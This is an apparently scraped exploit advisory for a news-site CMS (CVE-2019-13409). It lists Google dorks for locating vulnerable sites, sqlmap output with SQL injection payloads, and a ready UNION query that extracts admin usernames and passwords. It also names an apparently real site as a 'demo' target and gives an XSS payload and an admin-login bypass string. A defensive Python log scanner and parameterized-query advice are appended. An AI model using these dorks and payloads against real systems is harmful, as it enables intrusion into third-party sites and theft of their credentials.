News website CMS SQL injection & Bypass Admin Panel & XSS Vulnerability & Remote code Ex

CVE: CVE-2019-13409
Category: CWE-89
Price: Not specified
Severity: High
Author: Not specified
Risk: Critical
Exploitation Type: Remote
Date: 2020-06-05
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060021

Below is a copy:

News website CMS SQL injection & Bypass Admin Panel & XSS Vulnerability & Remote code Execution By Aryan Chehreghani
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 
+ Exploit Title: News website CMS SQL injection & Bypass Admin Panel && XSS Vulnerability By Aryan Chehreghani
+ Date: 2020-06-05 
+ Vendor Homepage: https://www.dassinfotech.com
+ Auxiliary software  : http://sqlmap.org
+ Exploit Author : Aryan Chehreghani | Ictus_TM
+ Dork CVE: CVE-2019-13409
+ Dork CWE : CWE-89
+ Version: All Version 
+ Tested on: win,linux,mac
###########################################################################################################################
+ Dork  1 :      intext:Design by Dassinfotech.com
+ Dork  2 :      inurl:detailsnews.php?id= 
+ Dork  3 :      intext:Design by Dassinfotech.com inurl:detailsnews.php?id= 
+ Dork  4 :      inurl:php?id=  intext:Design By Dassinfotech.com
###########################################################################################################################
                                [SQL injection]
 [+] Method ( Sql injection ) Ictus Security Team of Iran 
 [+] parameter : id = latestnews.php?catid=25
 ###########################################################################################################################
 [+] Testing Method:
 [+] - UNION query
__________SQLMAP__________result : 
||||||||||||||||||||||| Parameter: sec (GET) || |||||||||||||||||||||||
Parameter: catid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: catid=15' AND 6574=6574 AND 'RCcd'='RCcd

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: catid=15' AND (SELECT 9314 FROM (SELECT(SLEEP(5)))mkCY) AND 'rCId'='rCId

    Type: UNION query
    Title: Generic UNION query (NULL) - 19 columns
    Payload: catid=15' UNION ALL SELECT CONCAT(0x716b767171,0x6c746c51566743754d72706e67777068776f58415443736f62786f4d716448795a6b56744f664a61,0x716a6a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++|
[+]Using Sqlmap Example : sqlmap -u http://target.com/latestnews.php?catid=25 --dbs
========================================================================|
Exploit ==>
latestnews.php?catid=-23%27%20union%20select%201,2,3,4,5,6,7,group_concat(userid,Password),9,10,11,12,13,14,15,16,17,18,19%20fRom%20admin--%20-
 ========================================================================|
Demo:
 [+] http://ncrlife.in/latestnews.php?catid=25[SQL]
 ========================================================================|
                                [XSS Vulnerability]
 [+] Method :"><script>alert('Aryan Chehreghani | Ictus_TM')</script><"  
 [+] Type Code IN search Value / some Value 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                [Bypass Admin panel]
[+] Payload U / P  :   '=''or' / '=''or'
[+]Login Pages     :    victim.com/matri/login.php victim.com/india/login.php
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 [=] T.me/Clvsornapv
 [=] Telegram Channel ==> T.me/Ictus_TM
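
A defender-side check for the request patterns listed above, added here as an example that is not part of the original advisory: it scans web access log lines for non-numeric `catid`/`id` values, labels them by the three sqlmap technique types shown in the output, and flags `<script>` in any other parameter. The log lines are constructed samples; the function names, regexes, and the `search.php`/`q` names are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line of a combined-format access log entry.
REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Parameters the advisory reports as injectable; both should only ever be integers.
NUMERIC_PARAMS = {"catid", "id"}
# One rule per sqlmap technique type listed in the advisory; first match wins.
RULES = [
    ("union-query", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S)),
    ("time-based-blind", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("boolean-blind", re.compile(r"'\s*(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
]
XSS = re.compile(r"<\s*script\b", re.I)

def classify(value):
    """Name the injection technique a non-numeric id value resembles."""
    for name, rx in RULES:
        if rx.search(value):
            return name
    return "non-numeric-id"

def scan_line(line):
    """Return [(param, finding), ...] for one access log line."""
    m = REQ.search(line)
    if not m:
        return []
    findings = []
    # parse_qsl percent-decodes, so %27%20union%20select is matched as "' union select".
    for key, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        if key.lower() in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
            findings.append((key, classify(value)))
        elif XSS.search(value):
            findings.append((key, "script-tag-in-parameter"))
    return findings

# Constructed sample log lines (documentation IP range; search.php and q are assumed names).
PRE = '192.0.2.44 - - [05/Jun/2020:10:00:00 +0000] "GET '
SAMPLE_LOG = [
    PRE + '/latestnews.php?catid=25 HTTP/1.1" 200 5120',
    PRE + '/latestnews.php?catid=15%27%20AND%206574=6574%20AND%20%27a%27=%27a HTTP/1.1" 200 5120',
    PRE + '/latestnews.php?catid=15%27%20AND%20(SELECT(SLEEP(5)))%20AND%20%27a%27=%27a HTTP/1.1" 200 5120',
    PRE + '/latestnews.php?catid=-23%27%20union%20select%201,2,3--%20- HTTP/1.1" 200 5120',
    PRE + '/search.php?q=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(scan_line(entry) or "clean", "<-", entry.split('"')[1])
```

Login form fields are typically submitted in a POST body, which a standard access log does not record, so the `'=''or'` login string needs application-level or WAF logging to be seen. Detection of this kind complements, and does not replace, binding `catid` and `id` as integers in parameterized queries.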
